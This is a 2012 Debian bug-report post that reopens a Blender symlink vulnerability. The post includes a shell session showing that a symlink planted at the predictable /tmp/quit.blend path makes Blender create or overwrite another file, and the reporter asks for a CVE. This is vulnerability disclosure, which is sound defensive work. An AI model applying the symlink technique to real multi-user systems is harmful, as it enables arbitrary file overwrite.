Bug#584621: blender: possible symlink attack

Paul Wise pabs at debian.org
Wed Sep 5 14:23:58 UTC 2012 

Control: reopen -1
Control: found -1 2.63a-1

On Thu, 2012-01-05 at 12:48 +0100, Matteo F. Vescovi wrote:

> Version: 2.61-1
> 
> Closing.
> Feel free to re-open the report if the issue persists.
> 
> Thanks for your time and efforts.

Sorry I didn't notice this bug closing, but did you check that this
problem was fixed? It certainly is not fixed on wheezy (see below).

This bug has occurred and been fixed before (#298167) and it is a bit
disappointing that it was fixed in 2.37a-1 and then again by a different
maintainer and the maintainer after that didn't preserve those fixes.
Security team, can we get a CVE assigned for this? Perhaps that would
get people to fix it for good. The consequences are arbitrary file
creation or overwrite on a multi-user system:

pabs at chianamo ~ $ dpkg -l blender 
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                          Version             Architecture        Description
+++-=============================-===================-===================-===============================================================
ii  blender                       2.63a-1             amd64               Very fast and versatile 3D modeller/renderer
pabs at chianamo ~ $ sudo ln -s /home/pabs/foo /tmp/quit.blend
pabs at chianamo ~ $ ls -l /tmp/quit.blend /home/pabs/foo
ls: cannot access /home/pabs/foo: No such file or directory
lrwxrwxrwx 1 root root 14 Sep  5 22:01 /tmp/quit.blend -> /home/pabs/foo
pabs at chianamo ~ $ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: broken symbolic link to `/home/pabs/foo'
/home/pabs/foo:  ERROR: cannot open `/home/pabs/foo' (No such file or directory)
pabs at chianamo ~ $ blender 

Blender quit
pabs at chianamo ~ $ blender 
Saved session recovery to /tmp/quit.blend

Blender quit
pabs at chianamo ~ $ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 170K Sep  5 22:02 /home/pabs/foo
lrwxrwxrwx 1 root root   14 Sep  5 22:01 /tmp/quit.blend -> /home/pabs/foo
pabs at chianamo ~ $ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo:  Blender3D, saved as 64-bits little endian with version 2.63
pabs at chianamo ~ $ echo foo > /home/pabs/foo
pabs at chianamo ~ $ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs  4 Sep  5 22:03 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Sep  5 22:01 /tmp/quit.blend -> /home/pabs/foo
pabs at chianamo ~ $ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo:  ASCII text
pabs at chianamo ~ $ blender 
Saved session recovery to /tmp/quit.blend

Blender quit
pabs at chianamo ~ $ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo:  Blender3D, saved as 64-bits little endian with version 2.63

-- 
bye,
pabs

http://wiki.debian.org/PaulWise
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 836 bytes
Desc: This is a digitally signed message part
URL: <http://lists.alioth.debian.org/pipermail/pkg-multimedia-maintainers/attachments/20120905/82ae2e06/attachment.pgp>

More information about the pkg-multimedia-maintainers mailing list